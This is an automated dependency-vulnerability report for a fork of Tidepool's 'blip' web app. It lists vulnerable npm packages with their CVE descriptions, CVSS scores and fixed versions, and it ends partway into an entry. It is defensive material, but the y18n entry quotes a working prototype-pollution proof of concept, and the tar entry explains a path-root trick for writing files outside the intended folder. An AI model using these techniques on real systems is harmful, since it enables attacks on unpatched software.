This project forked from tidepool-org/blip
Blip is the internal name for Tidepool for Web, a tool for seeing diabetes data in one place.
Home Page: https://tidepool.org/products/tidepool/
License: BSD 2-Clause "Simplified" License
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
Vulnerable Libraries - trim-newlines-3.0.0.tgz, trim-newlines-1.0.0.tgz
Trim newlines from the start and/or end of a string
Library home page: https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz
Dependency Hierarchy:
Trim newlines from the start and/or end of a string
Library home page: https://registry.npmjs.org/trim-newlines/-/trim-newlines-1.0.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
Publish Date: 2021-05-28
URL: CVE-2021-33623
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623
Release Date: 2021-05-28
Fix Resolution (trim-newlines): 3.0.1
Direct dependency fix Resolution (stylelint): 13.2.1
Fix Resolution (trim-newlines): 3.0.1
Direct dependency fix Resolution (karma-coverage): 2.0.2
Vulnerable Library - cryptiles-2.0.5.tgzGeneral purpose crypto utilities
Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Eran Hammer cryptiles version 4.1.1 earlier contains a CWE-331: Insufficient Entropy vulnerability in randomDigits() method that can result in An attacker is more likely to be able to brute force something that was supposed to be random.. This attack appear to be exploitable via Depends upon the calling application.. This vulnerability appears to have been fixed in 4.1.2.
Publish Date: 2018-07-09
URL: CVE-2018-1000620
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620
Release Date: 2018-07-09
Fix Resolution: v4.1.2
Vulnerable Libraries - axios-0.15.3.tgz, axios-0.19.0.tgz
Promise based HTTP client for the browser and node.js
Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz
Dependency Hierarchy:
Promise based HTTP client for the browser and node.js
Library home page: https://registry.npmjs.org/axios/-/axios-0.19.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
Publish Date: 2020-11-06
URL: CVE-2020-28168
CVSS 3 Score Details (5.9)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-11-06
Fix Resolution (axios): 0.21.1
Direct dependency fix Resolution (github-api): 3.4.0
Fix Resolution (axios): 0.21.1
Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20
Vulnerable Library - handlebars-4.7.6.tgzHandlebars provides the power necessary to let you build semantic templates effectively with no frustration
Library home page: https://registry.npmjs.org/handlebars/-/handlebars-4.7.6.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.
Publish Date: 2021-05-04
URL: CVE-2021-23383
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383
Release Date: 2021-05-04
Fix Resolution (handlebars): 4.7.7
Direct dependency fix Resolution (karma-coverage): 2.0.0
Vulnerable Library - ssri-4.1.6.tgzStandard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.
Library home page: https://registry.npmjs.org/ssri/-/ssri-4.1.6.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
index.js in the ssri module before 5.2.2 for Node.js is prone to a regular expression denial of service vulnerability in strict mode functionality via a long base64 hash string.
Publish Date: 2018-03-04
URL: CVE-2018-7651
CVSS 3 Score Details (5.9)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7651
Release Date: 2018-03-04
Fix Resolution: 5.2.2
Vulnerable Libraries - prismjs-1.17.1.tgz, prismjs-1.19.0.tgz
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz
Dependency Hierarchy:
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Prism is a syntax highlighting library. Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS). When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very very long time to highlight. This problem has been fixed in Prism v1.24. As a workaround, do not use ASCIIDoc or ERB to highlight untrusted text. Other languages are not affected and can be used to highlight untrusted text.
Publish Date: 2021-06-28
URL: CVE-2021-32723
CVSS 3 Score Details (6.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-gj77-59wh-66hg
Release Date: 2021-06-28
Fix Resolution (prismjs): 1.24.0
Direct dependency fix Resolution (@storybook/addon-knobs): 6.1.0
Fix Resolution (prismjs): 1.24.0
Direct dependency fix Resolution (@storybook/addon-knobs): 6.1.0
Vulnerable Library - property-expr-2.0.2.tgztiny util for getting and setting deep object props safely
Library home page: https://registry.npmjs.org/property-expr/-/property-expr-2.0.2.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package property-expr before 2.0.3 are vulnerable to Prototype Pollution via the setter function.
Publish Date: 2020-08-18
URL: CVE-2020-7707
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7707
Release Date: 2020-08-18
Fix Resolution (property-expr): 2.0.3
Direct dependency fix Resolution (yup): 0.29.1
Vulnerable Libraries - lodash-3.3.1.tgz, lodash-4.17.19.tgz, lodash-4.17.4.tgz, lodash-4.17.20.tgz, lodash-4.17.15.tgz
The modern build of lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.19.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.20.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Mend Note: After conducting further research, Mend has determined that CVE-2020-28500 only affects environments with versions 4.0.0 to 4.17.20 of Lodash.
Publish Date: 2021-02-15
URL: CVE-2020-28500
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28500
Release Date: 2021-02-15
Fix Resolution (lodash): 4.17.21
Direct dependency fix Resolution (@babel/preset-env): 7.11.5
Vulnerable Libraries - ws-5.2.2.tgz, ws-6.2.1.tgz
Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js
Library home page: https://registry.npmjs.org/ws/-/ws-5.2.2.tgz
Dependency Hierarchy:
Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js
Library home page: https://registry.npmjs.org/ws/-/ws-6.2.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
ws is an open source WebSocket client and server library for Node.js. A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server. The vulnerability has been fixed in [email protected] (websockets/ws@00c425e). In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options.
Publish Date: 2021-05-25
URL: CVE-2021-32640
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-6fc8-4gx4-v693
Release Date: 2021-05-25
Fix Resolution (ws): 5.2.3
Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20
Fix Resolution (ws): 6.2.2
Direct dependency fix Resolution (webpack-dev-server): 3.8.1
Vulnerable Library - dns-packet-1.3.1.tgzAn abstract-encoding compliant module for encoding / decoding DNS packets
Library home page: https://registry.npmjs.org/dns-packet/-/dns-packet-1.3.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package dns-packet before 5.2.2. It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.
Publish Date: 2021-05-20
URL: CVE-2021-23386
CVSS 3 Score Details (6.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23386
Release Date: 2021-05-20
Fix Resolution (dns-packet): 1.3.2
Direct dependency fix Resolution (webpack-dev-server): 3.8.1
Vulnerable Library - chownr-1.0.1.tgzlike `chown -R`
Library home page: https://registry.npmjs.org/chownr/-/chownr-1.0.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
A TOCTOU issue in the chownr package before 1.1.0 for Node.js 10.10 could allow a local attacker to trick it into descending into unintended directories via symlink attacks.
Publish Date: 2020-06-15
URL: CVE-2017-18869
CVSS 3 Score Details (2.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18869
Release Date: 2020-06-15
Fix Resolution: 1.1.0
Vulnerable Libraries - npm-2.15.12.tgz, npm-5.1.0.tgz
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz
Dependency Hierarchy:
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of the npm CLI prior to 6.13.4 are vulnerable to an Arbitrary File Overwrite. It fails to prevent existing globally-installed binaries to be overwritten by other package installations. For example, if a package was installed globally and created a serve binary, any subsequent installs of packages that also create a serve binary would overwrite the previous serve binary. This behavior is still allowed in local installations and also through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.
Publish Date: 2019-12-13
URL: CVE-2019-16777
CVSS 3 Score Details (6.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
Release Date: 2020-10-09
Fix Resolution: npm - 6.13.4
Vulnerable Library - path-parse-1.0.6.tgzNode.js path.parse() ponyfill
Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.
Publish Date: 2021-05-04
URL: CVE-2021-23343
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2021-05-04
Fix Resolution (path-parse): 1.0.7
Direct dependency fix Resolution (eslint-plugin-react): 7.20.4
Vulnerable Library - axios-0.15.3.tgzPromise based HTTP client for the browser and node.js
Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accepting content after maxContentLength is exceeded.
Publish Date: 2019-05-07
URL: CVE-2019-10742
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2019-05-07
Fix Resolution (axios): 0.18.1
Direct dependency fix Resolution (github-api): 3.2.2
Vulnerable Libraries - npm-user-validate-1.0.0.tgz, npm-user-validate-0.1.5.tgz
User validations for npm
Library home page: https://registry.npmjs.org/npm-user-validate/-/npm-user-validate-1.0.0.tgz
Dependency Hierarchy:
User validations for npm
Library home page: https://registry.npmjs.org/npm-user-validate/-/npm-user-validate-0.1.5.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package npm-user-validate prior to version 1.0.1 is vulnerable to REDoS. The regex that validates a user's email took exponentially longer to process input strings that begin with the '@' character.
Publish Date: 2020-10-16
URL: WS-2020-0180
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-xgh6-85xh-479p
Release Date: 2020-10-16
Fix Resolution: 1.0.1
Vulnerable Library - socket.io-2.1.1.tgznode.js realtime framework server
Library home page: https://registry.npmjs.org/socket.io/-/socket.io-2.1.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Publish Date: 2021-01-19
URL: CVE-2020-28481
CVSS 3 Score Details (4.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28481
Release Date: 2021-01-19
Fix Resolution (socket.io): 2.4.0
Direct dependency fix Resolution (karma): 5.0.8
Vulnerable Libraries - npm-5.1.0.tgz, npm-2.15.12.tgz
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz
Dependency Hierarchy:
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to modify and/or gain access to arbitrary files on a user's system when the package is installed. This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.
Publish Date: 2019-12-13
URL: CVE-2019-16776
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
Release Date: 2020-10-07
Fix Resolution: npm - 6.13.3;yarn - 1.21.1
Vulnerable Libraries - postcss-7.0.32.tgz, postcss-5.2.18.tgz, postcss-6.0.23.tgz, postcss-7.0.27.tgz
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-7.0.32.tgz
Dependency Hierarchy:
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-5.2.18.tgz
Dependency Hierarchy:
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-6.0.23.tgz
Dependency Hierarchy:
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-7.0.27.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package postcss before 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern /*\s* sourceMappingURL=(.*).
Publish Date: 2021-04-26
URL: CVE-2021-23382
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
Release Date: 2021-04-26
Fix Resolution (postcss): 7.0.36
Direct dependency fix Resolution (autoprefixer): 9.8.5
Fix Resolution (postcss): 7.0.36
Direct dependency fix Resolution (css-loader): 2.0.0
Fix Resolution (postcss): 7.0.36
Direct dependency fix Resolution (stylelint): 13.2.1
Vulnerable Library - xmlhttprequest-ssl-1.5.5.tgzXMLHttpRequest for Node
Library home page: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-1.5.5.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
Publish Date: 2021-03-05
URL: CVE-2020-28502
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-h4j5-c7cj-74xg
Release Date: 2021-03-05
Fix Resolution (xmlhttprequest-ssl): 1.6.1
Direct dependency fix Resolution (karma): 5.0.8
Vulnerable Library - dot-prop-4.2.0.tgzGet, set, or delete a property from a nested object using a dot path
Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.
Publish Date: 2020-02-04
URL: CVE-2020-8116
CVSS 3 Score Details (7.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116
Release Date: 2020-02-04
Fix Resolution: dot-prop - 5.1.1
Vulnerable Library - url-parse-1.4.7.tgzSmall footprint URL parser that works seamlessly across Node.js and browser environments
Library home page: https://registry.npmjs.org/url-parse/-/url-parse-1.4.7.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
url-parse is vulnerable to URL Redirection to Untrusted Site
Publish Date: 2021-07-26
URL: CVE-2021-3664
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3664
Release Date: 2021-07-26
Fix Resolution (url-parse): 1.5.2
Direct dependency fix Resolution (@storybook/react): 5.3.20
Vulnerable Libraries - prismjs-1.19.0.tgz, prismjs-1.17.1.tgz
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz
Dependency Hierarchy:
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package prismjs before 1.23.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the prism-asciidoc, prism-rest, prism-tap and prism-eiffel components.
Publish Date: 2021-02-18
URL: CVE-2021-23341
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23341
Release Date: 2021-02-18
Fix Resolution (prismjs): 1.23.0
Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20
Fix Resolution (prismjs): 1.23.0
Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20
Vulnerable Library - tar-2.2.2.tgztar for node
Library home page: https://registry.npmjs.org/tar/-/tar-2.2.2.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has a arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc. This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar.
Publish Date: 2021-08-03
URL: CVE-2021-32804
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-3jfq-g458-7qm9
Release Date: 2021-08-03
Fix Resolution: tar - 3.2.2, 4.4.14, 5.0.6, 6.1.1
Vulnerable Library - handlebars-4.7.6.tgzHandlebars provides the power necessary to let you build semantic templates effectively with no frustration
Library home page: https://registry.npmjs.org/handlebars/-/handlebars-4.7.6.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
Publish Date: 2021-04-12
URL: CVE-2021-23369
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23369
Release Date: 2021-04-12
Fix Resolution (handlebars): 4.7.7
Direct dependency fix Resolution (karma-coverage): 2.0.0
Vulnerable Library - css-what-3.2.1.tgza CSS selector parser
Library home page: https://registry.npmjs.org/css-what/-/css-what-3.2.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.
Publish Date: 2021-05-28
URL: CVE-2021-33587
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33587
Release Date: 2021-05-28
Fix Resolution (css-what): 5.0.1
Direct dependency fix Resolution (@storybook/react): 6.1.7
Vulnerable Library - immer-1.10.0.tgzCreate your next immutable state by mutating the current one
Library home page: https://registry.npmjs.org/immer/-/immer-1.10.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Publish Date: 2021-09-02
URL: CVE-2021-3757
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa/
Release Date: 2021-09-02
Fix Resolution (immer): 9.0.6
Direct dependency fix Resolution (@storybook/react): 6.4.13
Vulnerable Libraries - npm-5.1.0.tgz, npm-2.15.12.tgz
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz
Dependency Hierarchy:
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It is possible for packages to create symlinks to files outside of thenode_modules folder through the bin field upon installation. A properly constructed entry in the package.json bin field would allow a package publisher to create a symlink pointing to arbitrary files on a user's system when the package is installed. This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.
Publish Date: 2019-12-13
URL: CVE-2019-16775
CVSS 3 Score Details (6.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
Release Date: 2019-12-13
Fix Resolution: npm - 6.13.3;yarn - 1.21.1
Vulnerable Libraries - serialize-javascript-1.9.1.tgz, serialize-javascript-2.1.2.tgz
Serialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz
Dependency Hierarchy:
Serialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-2.1.2.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".
Publish Date: 2020-06-01
URL: CVE-2020-7660
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660
Release Date: 2020-06-08
Fix Resolution (serialize-javascript): 3.1.0
Direct dependency fix Resolution (copy-webpack-plugin): 5.1.2
Fix Resolution (serialize-javascript): 3.1.0
Direct dependency fix Resolution (@storybook/react): 5.3.20
Vulnerable Library - is-my-json-valid-2.20.0.tgzA [JSONSchema](https://json-schema.org/) validator that uses code generation to be extremely fast.
Library home page: https://registry.npmjs.org/is-my-json-valid/-/is-my-json-valid-2.20.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Arbitrary Code Execution vulnerability was found in is-my-json-valid before 2.20.3 via the fromatName function.
Publish Date: 2020-06-09
URL: WS-2020-0344
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-06-09
Fix Resolution: is-my-json-valid - 2.20.3
Vulnerable Libraries - lodash-4.17.4.tgz, lodash-4.17.20.tgz, lodash-3.3.1.tgz, lodash-4.17.15.tgz, lodash-4.17.19.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.20.tgz
Dependency Hierarchy:
The modern build of lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz
Dependency Hierarchy:
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.19.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Publish Date: 2021-02-15
URL: CVE-2021-23337
CVSS 3 Score Details (7.2)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2021-02-15
Fix Resolution (lodash): 4.17.21
Direct dependency fix Resolution (@babel/preset-env): 7.11.5
Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz
Dependency Hierarchy:
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
Publish Date: 2020-11-17
URL: CVE-2020-7774
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/1654
Release Date: 2020-11-17
Fix Resolution: 3.2.2, 4.0.1, 5.0.5
Vulnerable Libraries - prismjs-1.19.0.tgz, prismjs-1.17.1.tgz
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz
Dependency Hierarchy:
Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.
Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Prism is vulnerable to Cross-Site Scripting. The easing preview of the Previewers plugin has an XSS vulnerability that allows attackers to execute arbitrary code in Safari and Internet Explorer. This impacts all Safari and Internet Explorer users of Prism >=v1.1.0 that use the Previewers plugin (>=v1.10.0) or the Previewer: Easing plugin (v1.1.0 to v1.9.0). This problem is fixed in version 1.21.0. To workaround the issue without upgrading, disable the easing preview on all impacted code blocks. You need Prism v1.10.0 or newer to apply this workaround.
Publish Date: 2020-08-07
URL: CVE-2020-15138
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-08-28
Fix Resolution (prismjs): 1.21.0
Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20
Fix Resolution (prismjs): 1.21.0
Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20
Vulnerable Library - html-parse-stringify2-2.0.1.tgzParses well-formed HTML (meaning all tags closed) into an AST and back. quickly.
Library home page: https://registry.npmjs.org/html-parse-stringify2/-/html-parse-stringify2-2.0.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package html-parse-stringify before 2.0.1; all versions of package html-parse-stringify2. Sending certain input could cause one of the regular expressions that is used for parsing to backtrack, freezing the process.
Publish Date: 2021-03-04
URL: CVE-2021-23346
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-545q-3fg6-48m7
Release Date: 2021-03-04
Fix Resolution: html-parse-stringify 2.0.1
Vulnerable Library - ansi-html-0.0.7.tgzAn elegant lib that converts the chalked (ANSI) text to HTML.
Library home page: https://registry.npmjs.org/ansi-html/-/ansi-html-0.0.7.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.
Publish Date: 2021-08-18
URL: CVE-2021-23424
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2021-23424
Release Date: 2021-08-18
Fix Resolution (ansi-html): 0.0.8
Direct dependency fix Resolution (@storybook/react): 5.3.20
Vulnerable Library - ua-parser-js-0.7.21.tgzLightweight JavaScript-based user-agent string parser
